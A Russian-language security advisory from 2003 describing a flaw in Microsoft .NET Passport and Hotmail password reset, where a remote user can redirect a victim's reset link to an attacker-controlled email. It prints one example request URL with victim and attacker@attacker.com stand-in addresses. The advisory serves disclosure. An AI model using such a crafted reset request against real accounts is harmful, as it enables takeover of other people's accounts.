Изменение паролей пользователей Microsoft .NET Passport

Дата публикации:
12.05.2003
Всего просмотров:
2237
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Microsoft .NET Passport, которая также воздействует на учетные записи Hotmail. Удаленный пользователь может изменить пароль произвольного пользователя и получить доступ к целевой учетной записи пользователя.

Сообщается, что удаленный пользователь может использовать форму сброса пароля .NET Passport, чтобы изменить пароль произвольного пользователя. Пример:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1
Удаленный пользователь (attacker@attacker.com) получит почтовое сообщение от .NET Passport сервера, в котором содержится URL для изменения пароля. Форма не требует ввода предыдущего пароля.

Ссылки: Hotmail & Passport (.NET Accounts) Vulnerability